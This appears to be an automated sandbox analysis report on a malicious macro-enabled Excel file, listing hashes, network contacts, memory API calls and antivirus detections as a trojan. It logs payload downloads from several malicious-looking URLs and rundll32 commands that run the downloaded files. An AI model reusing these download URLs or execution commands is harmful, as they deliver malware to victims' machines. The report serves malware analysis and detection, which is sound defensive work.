Summary | ZeroBOX

catalog-64874377.xlsm

Category Machine Started Completed
FILE s1_win7_x6402 April 16, 2021, 9:53 a.m. April 16, 2021, 9:55 a.m.
Size 120.1KB
Type Microsoft Excel 2007+
MD5 608719001a3fbf939763a416e80f1410
SHA256 953bf3a25e16716f18eb6da7fc85d732fe4e3c554797756014055e60b763f140
CRC32 9ED33ACD
ssdeep 3072:mOKybaf6JMcuaNB19ofM1xjy/YD6GQ8cl:mc2f6Jzuu9oM1lyu7Qnl
Yara None matched

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
204.11.58.33 Active Moloch
34.95.253.189 Active Moloch
75.119.136.137 Active Moloch

request GET http://boehm-kavon15lc.ru.com/body.html
request GET http://rosenbaum-milan15y.ru.com/body.html
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70af1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70b4f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x70731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74f41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75241000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71f71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6e5e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x743f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2616
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$catalog-64874377.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000338
filepath: C:\Users\test22\AppData\Local\Temp\~$catalog-64874377.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$catalog-64874377.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
host 172.217.25.14
MicroWorld-eScan Trojan.Vita.18
FireEye Trojan.Vita.18
K7GW Trojan ( 0057940f1 )
K7AntiVirus Trojan ( 0057940f1 )
Arcabit Trojan.Vita.18
Cyren XLSM/Sneaky.T.gen!Camelot
BitDefender Trojan.Vita.18
Tencent Trojan.Win32.Macro40.11000270
Emsisoft Trojan.Vita.18 (B)
Ikarus Trojan.Office.Doc
MAX malware (ai score=88)
GData Trojan.Vita.18
Qihoo-360 macro.office.07defname.gen
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://boehm-kavon15lc.ru.com/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue1
filepath: C:\Users\test22\ghnrope.rue1
1 0 0

URLDownloadToFileW

url: http://rosenbaum-milan15y.ru.com/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue2
filepath: C:\Users\test22\ghnrope.rue2
1 0 0

URLDownloadToFileW

url: https://glsiba.org/drms/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue3
filepath: C:\Users\test22\ghnrope.rue3
2148270085 0

URLDownloadToFileW

url: https://jahthroneafricancrafts.com/drms/body.html
stack_pivoted: 0
filepath_r: ..\ghnrope.rue4
filepath: C:\Users\test22\ghnrope.rue4
2148270085 0
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue3,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue2,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue4,DllRegisterServer
parent_process excel.exe martian_process rundll32 ..\ghnrope.rue1,DllRegisterServer